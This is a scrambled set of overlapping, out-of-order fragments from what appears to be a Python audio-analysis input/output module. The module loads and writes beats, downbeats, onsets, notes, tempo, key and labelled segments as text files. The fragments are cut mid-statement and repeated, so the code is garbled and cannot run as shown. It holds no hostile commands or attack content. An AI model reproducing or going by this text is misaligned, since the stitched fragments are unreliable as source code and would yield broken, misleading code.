np.append(strengths, 1. - strength_sum)", "written at the beginning of the file as comment. Returns ------- numpy structured", "1. max_len : int, deprecated Return at most `max_len` tempi. Returns ------- tempi", "handle File to write the notes to. fmt : str or sequence of", "given file. Tempo information must have the following format: 'main tempo' ['secondary tempo'", "Returns ------- numpy array Events. Notes ----- Comments (lines starting with '#') and", "'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum)", "tempi = np.array(tempi, ndmin=2) # default values t1 = t2 = strength =", "downbeats from the given file. Parameters ---------- filename : str or file handle", "strengths (second column) is returned. \"\"\" # try to load the data from", "to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'],", "\"\"\" Write the most dominant tempi and the relative strength to a file.", "of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f", "1st column is the event's time, the rest is ignored return events[:, 0]", "see SEGMENT_DTYPE). filename : str or file handle Output filename or handle. fmt", "one per row (column definition see SEGMENT_DTYPE). filename : str or file handle", "file as comment. Returns ------- numpy structured array Labelled segments Notes ----- Labelled", "------- segments : numpy structured array Structured array with columns 'start', 'end', and", ": bool, deprecated Sort the tempi by their strength. norm_strengths : bool, deprecated", "rows with a \"1\" in the 2nd column are downbeats return values[values[:, 1]", "% e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings", "the beats from the given file, one beat per line of format 'beat_time'", "np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label return segments", "columns are ignored, i.e. only the first column is returned. \"\"\" # read", "number per line. Parameters ---------- filename : str or file handle File to", "from the given file, one note per line of format 'onset_time' 'note_number' ['duration'", "the beginning, end, and label of segments. \"\"\" start, end, label = [],", "if needed if isinstance(fmt, (list, tuple)): fmt = delimiter.join(fmt) # write output with", "sequence of strs, optional A single format (e.g. '%.3f'), a sequence of formats", "None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt is None:", "is of form <start> <end> <label>, where <start> and <end> are floating point", ": bool, deprecated Report the lower tempo first (as required by MIREX). Returns", "'\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\"", "File to write the events to. fmt : str or sequence of strs,", "# but we need to apply this '(-strengths)' trick because we want #", "hack-ish, find a better solution tempi = values[values > split_value] strengths = values[values", ": numpy array, shape (num_tempi[, 2]) Array with tempi. If no strength is", "Context manager which yields an open file or handle with the given mode", "as comment. \"\"\" if fmt is None and beats.ndim == 2: fmt =", "warnings.warn('`sort` is deprecated as of version 0.16 and will be ' 'removed in", "filename : str or file handle Output file. delimiter : str, optional String", "'num_tempi' is returned. If strengths are given, a 2D array with tempi (first", "order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return at", "(num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or", "file handle Output file. delimiter : str, optional String or character separating columns.", "the ' 'tempi manually') if t1 > t2: t1, t2, strength = t2,", "' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have same length", "label = [], [], [] with open_file(filename) as f: for line in f:", "line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l) segments =", "columns 'start', 'end', and 'label', containing the beginning, end, and label of segments.", "notes to a file. Parameters ---------- notes : numpy array, shape (num_notes, 2)", "is not None: import warnings warnings.warn('`norm_strengths` is deprecated as of version 0.16 and", "% tuple(e.tolist()) except AttributeError: string = e except TypeError: string = fmt %", "numpy structured arrays that contain labelled segments # 'label' needs to be castable", "fid = _io.open(filename, mode) else: f = filename fid = None # yield", "and strengths # TODO: this is kind of hack-ish, find a better solution", "---------- filename: str or file handle File to load the notes from. Returns", "strength = np.nan # only one tempo was detected if len(tempi) == 1:", "return f.read().strip() def write_key(key, filename, header=None): \"\"\" Write key string to a file.", "0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths", "or file handle File to load the events from. Returns ------- numpy array", "sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or a multi-format string, e.g.", "deprecated Return at most `max_len` tempi. Returns ------- tempi : numpy array, shape", "as np from .audio import load_audio_file from .midi import load_midi, write_midi from ..utils", "of form <start> <end> <label>, where <start> and <end> are floating point numbers,", "sum 1. max_len : int, deprecated Return at most `max_len` tempi. Returns -------", "formats, or a multi-format string (e.g. '%.3f %.3f'), in which case `delimiter` is", "or a multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter`", "numpy structured array Labelled segments, one per row (column definition see SEGMENT_DTYPE). filename", "will be ' 'removed in 0.18. Please sort the returned array ' 'separately.')", "Parameters ---------- segments : numpy structured array Labelled segments, one per row (column", "given mode and closes it if needed afterwards. Parameters ---------- filename : str", "%d'), in which case `delimiter` is ignored. delimiter : str, optional String or", "events from a text file, one floating point number per line. Parameters ----------", "fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if not notes.ndim ==", "returned. \"\"\" # read in the events, one per line events = np.loadtxt(filename,", "to. fmt : str or sequence of strs, optional A sequence of formats", "String or character separating columns. header : str, optional String that will be", "sequence of formats, or a multi-format string (e.g. '%.3f %.3f'), in which case", "array Beats or downbeats to be written to file. filename : str or", "\"\"\" Write the events to a file, one event per line. Parameters ----------", "str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the built-in", "closes it if needed afterwards. Parameters ---------- filename : str or file handle", "---------- filename : str or file handle File to load the tempo from.", "load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from", "handle File to load the tempo from. split_value : float, optional Value to", "1]) # for MIREX, the lower tempo must be given first if mirex", "str or file handle File to load the tempo from. split_value : float,", "of strs, optional A sequence of formats (e.g. ['%.3f', '%d', '%.3f', '%d']), or", "# normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is", "downbeats return values[values[:, 1] == 1][:, 0] else: # 1st column is the", "column) and their strengths (second column). filename : str or file handle Output", "[], [], [] with open_file(filename) as f: for line in f: s, e,", "== 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt,", "\"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load", "Yields ------ Open file (handle). \"\"\" # check if we need to open", "'(-strengths)' trick because we want # tempi with uniformly distributed strengths to keep", "+ '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False):", "If strengths are given, a 2D array with tempi (first column) and their", "== 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize the strengths if norm_strengths", "per line events = np.loadtxt(filename, ndmin=2) # 1st column is the event's time,", "values[values > split_value] strengths = values[values <= split_value] # make the strengths behave", "import io as _io import contextlib import numpy as np from .audio import", "normalize the strengths if norm_strengths is not None: import warnings warnings.warn('`norm_strengths` is deprecated", "manager which yields an open file or handle with the given mode and", "AssertionError('strengths must be positive') # no strength is given, assume an evenly distributed", "strengths (second column). filename : str or file handle Output file. delimiter :", "single format (e.g. '%.3f'), a sequence of formats, or a multi-format string (e.g.", "max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of version 0.16", "column) is returned. \"\"\" # try to load the data from file values", "character separating columns. header : str, optional String that will be written at", "e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events write_onsets = write_events @suppress_warnings def", "Parameters ---------- events : numpy array Events to be written to file. filename", "'%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`') # truncate", "array Beats to be written to file. filename : str or file handle", "are represented as numpy structured array with three named columns: 'start' contains the", "file or handle with the given mode and closes it if needed afterwards.", "open_file(filename) as f: for line in f: s, e, l = line.split() start.append(float(s))", "strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most dominant tempi", "strength # format as a numpy array and write to output out =", ": numpy array Events to be written to file. filename : str or", "handle yield f # close the file if needed if fid: fid.close() @suppress_warnings", "filename : str or file handle File to load the downbeats from. Returns", "strength is parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths", "an open file or handle with the given mode and closes it if", "\"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt,", "Write the beats to a file. Parameters ---------- beats : numpy array Beats", "in version 0.17. Please sort the ' 'tempi manually') if t1 > t2:", "array Events to be written to file. filename : str or file handle", "is a string. Parameters ---------- filename : str or file handle File to", "str, optional String that will be written at the beginning of the file", "= ['%.3f', '%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt,", "a file. Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row", "is the event's time, the rest is ignored return events[:, 0] def write_events(events,", "(e.g. '%.3f %d'), in which case `delimiter` is ignored. delimiter : str, optional", "`delimiter` is ignored. delimiter : str, optional String or character separating columns. header", "or a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is ignored.", "filename or handle. fmt : str or sequence of strs, optional A sequence", "shape (num_tempi[, 2]) Array with tempi. If no strength is parsed, a 1-dimensional", "File to load the notes from. Returns ------- numpy array Notes. \"\"\" return", "!= len(strengths): raise AssertionError('tempi and strengths must have same length') # order the", "load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given file.", "given fmt = delimiter.join(fmt[:notes.shape[1]]) # write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header)", "Load labelled segments from file, one segment per line. Each segment is of", "str or file handle File to load the beats from. downbeats : bool,", "interpreted as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort :", "segments to a file. Parameters ---------- segments : numpy structured array Labelled segments,", "as of version 0.16 and will be ' 'removed in 0.18. Please sort", ": str or file handle File to read key information from. Returns -------", "definition see SEGMENT_DTYPE). filename : str or file handle Output filename or handle.", "write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy", "opened. Yields ------ Open file (handle). \"\"\" # check if we need to", "not None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 '", "be written at the beginning of the file as comment. Returns ------- key", "f = fid = _io.open(filename, mode) else: f = filename fid = None", "filename according to their filename into tempi and strengths # TODO: this is", "handle with the given mode and closes it if needed afterwards. Parameters ----------", "return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write", "to a file. Parameters ---------- beats : numpy array Beats to be written", "be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] #", "Parameters ---------- notes : numpy array, shape (num_notes, 2) Notes, row format 'onset_time'", "values t1 = t2 = strength = np.nan # only one tempo was", "array ' 'separately.') # Note: use 'mergesort', because we want a stable sorting", "header=header) def load_segments(filename): \"\"\" Load labelled segments from file, one segment per line.", "absolute_import, division, print_function import io as _io import contextlib import numpy as np", "of version 0.16 and will be ' 'removed in 0.18. Please truncate the", "filename: str or file handle File to load the notes from. Returns -------", "end position, and 'label' the segment label. \"\"\" if fmt is None: fmt", "'%.3f', '%d'] if not notes.ndim == 2: raise ValueError('unknown format for `notes`') #", "(first column) and their strengths (second column). filename : str or file handle", "tempi and strengths. `values` > `split_value` are interpreted as tempi [bpm], `values` <=", "mode and closes it if needed afterwards. Parameters ---------- filename : str or", "and closes it if needed afterwards. Parameters ---------- filename : str or file", "np.float), ('end', np.float), ('label', object)] # overwrite the built-in open() to transparently apply", "sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g. '%.3f %d'),", "tuple)): fmt = delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: #", "array and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename,", "the downbeats from the given file. Parameters ---------- filename : str or file", "consider only the two strongest tempi and strengths elif len(tempi) > 1: t1,", "with a beat number of 1). \"\"\" if beats.ndim == 2: beats =", "to distinguish between tempi and strengths. `values` > `split_value` are interpreted as tempi", "the labelled segments from. Returns ------- segments : numpy structured array Structured array", "split_value] strengths = values[values <= split_value] # make the strengths behave properly strength_sum", "filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file. Parameters ----------", "file. Parameters ---------- tempi : numpy array Array with the detected tempi (first", "use 'mergesort', because we want a stable sorting algorithm # which keeps the", "Write the events to a file, one event per line. Parameters ---------- events", "'onset_time' 'note_number' ['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to", "f # close the file if needed if fid: fid.close() @suppress_warnings def load_events(filename):", "is kind of hack-ish, find a better solution tempi = values[values > split_value]", "default format if fmt is None: fmt = ['%.3f', '%d', '%.3f', '%d'] if", "distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) # normalize", "downbeats (i.e. only the times of those beats with a beat number of", "# encoding: utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function", "the end position, and 'label' the segment label. \"\"\" if fmt is None:", "if needed afterwards. Parameters ---------- filename : str or file handle File (handle)", "fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the downbeats from the given file.", "# tempi and strengths must have same length if len(tempi) != len(strengths): raise", "need to open the file if isinstance(filename, string_types): f = fid = _io.open(filename,", "strengths must have same length if len(tempi) != len(strengths): raise AssertionError('tempi and strengths", "Events. Notes ----- Comments (lines starting with '#') and additional columns are ignored,", "if beats.ndim == 2: beats = beats[beats[:, 1] == 1][:, 0] if fmt", "if len(tempi) == 1: t1 = tempi[0][0] strength = 1. # consider only", "tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX, the", "the event's time, the rest is ignored return events[:, 0] def write_events(events, filename,", "Write labelled segments to a file. Parameters ---------- segments : numpy structured array", "strengths are given, a 2D array with tempi (first column) and their relative", "want # tempi with uniformly distributed strengths to keep their order sort_idx =", "f: # write header if header is not None: f.write(bytes(('# ' + header", "'%d'] elif fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header)", "fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) @suppress_warnings def load_notes(filename): \"\"\" Load", "def load_tempo(filename, split_value=1., sort=None, norm_strengths=None, max_len=None): \"\"\" Load tempo information from the given", "return np.vstack((tempi[:max_len], strengths[:max_len])).T def write_tempo(tempi, filename, delimiter='\\t', header=None, mirex=None): \"\"\" Write the most", "== 1][:, 0] else: # 1st column is the beat time, the rest", "\"\"\" Load the key from the given file. Parameters ---------- filename : str", "format 'onset_time' 'note_number' ['duration' ['velocity']]. filename : str or file handle File to", "of those beats with a beat number of 1). \"\"\" if beats.ndim ==", "beginning of the file as comment. \"\"\" events = np.array(events) # reformat fmt", "delimiter='\\t', header=None): \"\"\" Write the events to a file, one event per line.", "a \"1\" in the 2nd column are downbeats return values[values[:, 1] == 1][:,", "Returns ------- segments : numpy structured array Structured array with columns 'start', 'end',", "optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string", "..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays", "fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename): \"\"\" Load the", "out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f', '%.2f', '%.2f'], delimiter=delimiter, header=header)", "= fid = _io.open(filename, mode) else: f = filename fid = None #", "to load the notes from. Returns ------- numpy array Notes. \"\"\" return np.loadtxt(filename,", "is ignored return values[:, 0] return values def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None):", "(e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g. '%.3f %.3f %s'), in", "to file. filename : str or file handle File to write the beats", "def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a file.", "suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays that contain", "Write the downbeats to a file. Parameters ---------- beats : numpy array Beats", "except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets =", "in which case `delimiter` is ignored. delimiter : str, optional String or character", "None: import warnings warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and", "Load the beats from the given file, one beat per line of format", "'beat_time' ['beat_number']. Parameters ---------- filename : str or file handle File to load", "header=None): \"\"\" Write the downbeats to a file. Parameters ---------- beats : numpy", "only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values =", "float, optional Value to distinguish between tempi and strengths. `values` > `split_value` are", "# make the given tempi a 2d array tempi = np.array(tempi, ndmin=2) #", "removed in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi", "%s'), in which case `delimiter` is ignored. delimiter : str, optional String or", "TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush() load_onsets = load_events", "= ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments write_chords", "# 1st column is the beat time, the rest is ignored return values[:,", "with three named columns: 'start' contains the start position (e.g. seconds), 'end' the", "be removed in 0.18. Please normalize strengths ' 'separately.') strengths /= float(strength_sum) #", "dominant tempo. strength : float Their relative strength. \"\"\" # make the given", "comment. Returns ------- key : str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header)", "def write_beats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the beats to a file.", "from. Returns ------- segments : numpy structured array Structured array with columns 'start',", "with open_file(filename, 'wb') as f: # write header if header is not None:", "column). filename : str or file handle Output file. delimiter : str, optional", "of strs, optional A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a", "truncate format to the number of colums given fmt = delimiter.join(fmt[:notes.shape[1]]) # write", "# default values t1 = t2 = strength = np.nan # only one", "first (as required by MIREX). Returns ------- tempo_1 : float The most dominant", "and <end> are floating point numbers, and <label> is a string. Parameters ----------", "str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None, norm_strengths=None,", "sort the returned array ' 'separately.') # Note: use 'mergesort', because we want", "len(tempi) == 1: t1 = tempi[0][0] strength = 1. # consider only the", "of length 'num_tempi' is returned. If strengths are given, a 2D array with", "fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header) def load_downbeats(filename):", "segments, one per row (column definition see SEGMENT_DTYPE). filename : str or file", "if sort: import warnings warnings.warn('`sort` is deprecated as of version 0.16 and will", "['relative_strength']] Parameters ---------- filename : str or file handle File to load the", "AssertionError('tempi and strengths must have same length') # order the tempi according to", "to write the beats to. fmt : str or sequence of strs, optional", "parsed, a 1-dimensional array of length 'num_tempi' is returned. If strengths are given,", "---------- beats : numpy array Beats to be written to file. filename :", "kind of hack-ish, find a better solution tempi = values[values > split_value] strengths", "or file handle File (handle) to open. mode: {'r', 'w'} Specifies the mode", "most 'max_len' tempi and their relative strength if max_len is not None: import", "but we need to apply this '(-strengths)' trick because we want # tempi", "Write key string to a file. Parameters ---------- key : str Key name.", "max_len=None): \"\"\" Load tempo information from the given file. Tempo information must have", "to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label', object)] # overwrite the", "write_onsets = write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the", "<end> are floating point numbers, and <label> is a string. Parameters ---------- filename", ": numpy array, shape (num_notes, 2) Notes, row format 'onset_time' 'note_number' ['duration' ['velocity']].", "distributed strengths to keep their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths", "strength. norm_strengths : bool, deprecated Normalize the strengths to sum 1. max_len :", "= e except TypeError: string = fmt % e f.write(bytes((string + '\\n').encode(ENCODING))) f.flush()", "or file handle File to load the downbeats from. Returns ------- numpy array", "<label>, where <start> and <end> are floating point numbers, and <label> is a", "= delimiter.join(fmt) # write output with open_file(filename, 'wb') as f: # write header", "Labelled segments Notes ----- Labelled segments are represented as numpy structured array with", "given file, one beat per line of format 'beat_time' ['beat_number']. Parameters ---------- filename", "def write_key(key, filename, header=None): \"\"\" Write key string to a file. Parameters ----------", "needs to be castable to str SEGMENT_DTYPE = [('start', np.float), ('end', np.float), ('label',", "from. split_value : float, optional Value to distinguish between tempi and strengths. `values`", "detected if len(tempi) == 1: t1 = tempi[0][0] strength = 1. # consider", "encoding: utf-8 \"\"\" Input/output package. \"\"\" from __future__ import absolute_import, division, print_function import", "comment. mirex : bool, deprecated Report the lower tempo first (as required by", "the rest is ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None):", "Load only downbeats instead of beats. Returns ------- numpy array Beats. \"\"\" values", "['velocity']]. Parameters ---------- filename: str or file handle File to load the notes", "to write the notes to. fmt : str or sequence of strs, optional", "0] if fmt is None: fmt = '%.3f' write_events(beats, filename, fmt, delimiter, header)", "per line. Parameters ---------- events : numpy array Events to be written to", "0.16 ' 'and will be removed in version 0.17. Please sort the '", "' + header + '\\n').encode(ENCODING))) # write events for e in events: try:", "be written at the beginning of the file as comment. mirex : bool,", "---------- filename : str or file handle File to read the labelled segments", "must have same length') # order the tempi according to their strengths if", "and write to output out = np.array([t1, t2, strength], ndmin=2) write_events(out, filename, fmt=['%.2f',", "' 'removed in 0.18. Please sort the returned array ' 'separately.') # Note:", "segments = np.zeros(len(start), dtype=SEGMENT_DTYPE) segments['start'] = start segments['end'] = end segments['label'] = label", "tempi (first column) and their strengths (second column). filename : str or file", "same length') # order the tempi according to their strengths if sort: import", "segments def write_segments(segments, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write labelled segments to a", "is deprecated as of version 0.16 ' 'and will be removed in version", "header=None): \"\"\" Write the events to a file, one event per line. Parameters", ".midi import load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' #", "assume an evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) /", "strength : float Their relative strength. \"\"\" # make the given tempi a", "those beats with a beat number of 1). \"\"\" if beats.ndim == 2:", "file. Parameters ---------- segments : numpy structured array Labelled segments, one per row", "given, a 2D array with tempi (first column) and their relative strengths (second", "- strength # format as a numpy array and write to output out", "SEGMENT_DTYPE). filename : str or file handle Output filename or handle. fmt :", "beats from the given file, one beat per line of format 'beat_time' ['beat_number'].", "Please normalize strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must", "with the detected tempi (first column) and their strengths (second column). filename :", "np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows with a \"1\"", "strengths. `values` > `split_value` are interpreted as tempi [bpm], `values` <= `split_value` are", "comment. Returns ------- numpy array Notes. \"\"\" # set default format if fmt", "fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename, fmt=fmt, delimiter=delimiter, header=header) load_chords = load_segments", "segments from file, one segment per line. Each segment is of form <start>", "handle File to write the beats to. fmt : str or sequence of", "strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') # no strength", "\"\"\" Write the beats to a file. Parameters ---------- beats : numpy array", ": str Key name. \"\"\" write_events([key], filename, fmt='%s', header=header) def load_tempo(filename, split_value=1., sort=None,", "Load tempo information from the given file. Tempo information must have the following", "keys # but we need to apply this '(-strengths)' trick because we want", "string to a file. Parameters ---------- key : str Key name. filename :", "column) and their relative strengths (second column) is returned. \"\"\" # try to", "segments : numpy structured array Labelled segments, one per row (column definition see", "and ' 'will be removed in 0.18. Please normalize strengths ' 'separately.') strengths", "def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the events to a file,", "if t1 > t2: t1, t2, strength = t2, t1, 1. - strength", "'w'} Specifies the mode in which the file is opened. Yields ------ Open", "or file handle File to write the events to. fmt : str or", "f: for line in f: s, e, l = line.split() start.append(float(s)) end.append(float(e)) label.append(l)", "key : str Key name. filename : str or file handle Output file.", "0.16 and will be ' 'removed in 0.18. Please truncate the returned array", "= tempi[:2, 0] strength = tempi[0, 1] / sum(tempi[:2, 1]) # for MIREX,", "key string to a file. Parameters ---------- key : str Key name. filename", "evenly distributed one if strength_sum == 0: strengths = np.ones_like(tempi) / float(len(tempi)) #", "file is opened. Yields ------ Open file (handle). \"\"\" # check if we", ": float Their relative strength. \"\"\" # make the given tempi a 2d", "warnings.warn('`mirex` argument is deprecated as of version 0.16 ' 'and will be removed", "return load_beats(filename, downbeats=True) def write_downbeats(beats, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the downbeats", "a multi-format string, e.g. '%.3f %d %.3f %d', in which case `delimiter` is", "numpy array Events. Notes ----- Comments (lines starting with '#') and additional columns", "beats[beats[:, 1] == 1][:, 0] if fmt is None: fmt = '%.3f' write_events(beats,", "number of the beats, they are filtered to contain only the downbeats (i.e.", "%.3f'), in which case `delimiter` is ignored. delimiter : str, optional String or", "line. Parameters ---------- filename : str or file handle File to load the", "len(strengths) == 1: strengths = np.append(strengths, 1. - strength_sum) if np.any(strengths < 0):", "the key from the given file. Parameters ---------- filename : str or file", "write_events @suppress_warnings def load_beats(filename, downbeats=False): \"\"\" Load the beats from the given file,", "['duration' ['velocity']]. Parameters ---------- filename: str or file handle File to load the", "end, and label of segments. \"\"\" start, end, label = [], [], []", "def write_notes(notes, filename, fmt=None, delimiter='\\t', header=None): \"\"\" Write the notes to a file.", "if max_len is not None: import warnings warnings.warn('`max_len` is deprecated as of version", "mirex is not None: import warnings warnings.warn('`mirex` argument is deprecated as of version", "file. filename : str or file handle File to write the beats to.", "\"\"\" # check if we need to open the file if isinstance(filename, string_types):", "as of version 0.16 and ' 'will be removed in 0.18. Please normalize", "= strengths[sort_idx] # return at most 'max_len' tempi and their relative strength if", "their order sort_idx = (-strengths).argsort(kind='mergesort') tempi = tempi[sort_idx] strengths = strengths[sort_idx] # return", "str or file handle File to load the events from. Returns ------- numpy", "Parameters ---------- filename : str or file handle File to read key information", "tempo must be given first if mirex is not None: import warnings warnings.warn('`mirex`", "the data from file values = np.loadtxt(filename, ndmin=1) # split the filename according", "---------- filename : str or file handle File to load the events from.", "a multi-format string (e.g. '%.3f %.3f %s'), in which case `delimiter` is ignored.", "strengths[sort_idx] # return at most 'max_len' tempi and their relative strength if max_len", "open. mode: {'r', 'w'} Specifies the mode in which the file is opened.", "that will be written at the beginning of the file as comment. Returns", "File to load the tempo from. split_value : float, optional Value to distinguish", "optional String that will be written at the beginning of the file as", "@suppress_warnings def load_notes(filename): \"\"\" Load the notes from the given file, one note", "Beats to be written to file. filename : str or file handle File", "A sequence of formats (e.g. ['%.3f', '%.3f', '%s']), or a multi-format string (e.g.", "need to apply this '(-strengths)' trick because we want # tempi with uniformly", "Parameters ---------- filename : str or file handle File to load the beats", "or file handle File to read key information from. Returns ------- str Key.", "1. - strength_sum) if np.any(strengths < 0): raise AssertionError('strengths must be positive') #", "segment is of form <start> <end> <label>, where <start> and <end> are floating", "a beat number of 1). \"\"\" if beats.ndim == 2: beats = beats[beats[:,", "solution tempi = values[values > split_value] strengths = values[values <= split_value] # make", "version 0.16 and will be ' 'removed in 0.18. Please truncate the returned", "to a file. Parameters ---------- tempi : numpy array Array with the detected", "label. \"\"\" if fmt is None: fmt = ['%.3f', '%.3f', '%s'] write_events(segments, filename,", "to apply this '(-strengths)' trick because we want # tempi with uniformly distributed", "'tempi manually') if t1 > t2: t1, t2, strength = t2, t1, 1.", "comment. \"\"\" if fmt is None and beats.ndim == 2: fmt = ['%.3f',", "Notes ----- If `beats` contains both time and number of the beats, they", "file as comment. Returns ------- numpy array Notes. \"\"\" # set default format", "\"\"\" values = np.loadtxt(filename, ndmin=1) if values.ndim > 1: if downbeats: # rows", "fmt is None and beats.ndim == 2: fmt = ['%.3f', '%d'] elif fmt", "# split the filename according to their filename into tempi and strengths #", "the beginning of the file as comment. Returns ------- key : str Key", "file handle File (handle) to open. mode: {'r', 'w'} Specifies the mode in", "<label> is a string. Parameters ---------- filename : str or file handle File", "file handling @contextlib.contextmanager def open_file(filename, mode='r'): \"\"\" Context manager which yields an open", "load_midi, write_midi from ..utils import suppress_warnings, string_types ENCODING = 'utf8' # dtype for", "ignored return events[:, 0] def write_events(events, filename, fmt='%.3f', delimiter='\\t', header=None): \"\"\" Write the", "\"\"\" Load the beats from the given file, one beat per line of", "that will be written at the beginning of the file as comment. Notes", "as tempi [bpm], `values` <= `split_value` are interpreted as strengths. sort : bool,", "Output file. delimiter : str, optional String or character separating columns. header :", "the lower tempo first (as required by MIREX). Returns ------- tempo_1 : float", "= np.loadtxt(filename, ndmin=2) # 1st column is the event's time, the rest is", "algorithm # which keeps the order of the keys in case of duplicate", "'%.3f'), a sequence of formats (e.g. ['%.3f', '%d']), or a multi-format string (e.g.", "import suppress_warnings, string_types ENCODING = 'utf8' # dtype for numpy structured arrays that", "Parameters ---------- tempi : numpy array Array with the detected tempi (first column)", "or file handle File to load the beats from. downbeats : bool, optional", "are filtered to contain only the downbeats (i.e. only the times of those", "len(strengths): raise AssertionError('tempi and strengths must have same length') # order the tempi", "str Key name. filename : str or file handle Output file. header :", "notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled segments from", "Note: use 'mergesort', because we want a stable sorting algorithm # which keeps", "# no strength is given, assume an evenly distributed one if strength_sum ==", "write the notes write_events(notes, filename, fmt=fmt, delimiter=delimiter, header=header) def load_segments(filename): \"\"\" Load labelled", "string (e.g. '%.3f %.3f'), in which case `delimiter` is ignored. delimiter : str,", "'%d']), or a multi-format string (e.g. '%.3f %d'), in which case `delimiter` is", "strengths ' 'separately.') strengths /= float(strength_sum) # tempi and strengths must have same", "float(strength_sum) # tempi and strengths must have same length if len(tempi) != len(strengths):", "numpy array Array with the detected tempi (first column) and their strengths (second", "header is not None: f.write(bytes(('# ' + header + '\\n').encode(ENCODING))) # write events", "warnings warnings.warn('`max_len` is deprecated as of version 0.16 and will be ' 'removed", "file handle Output filename or handle. fmt : 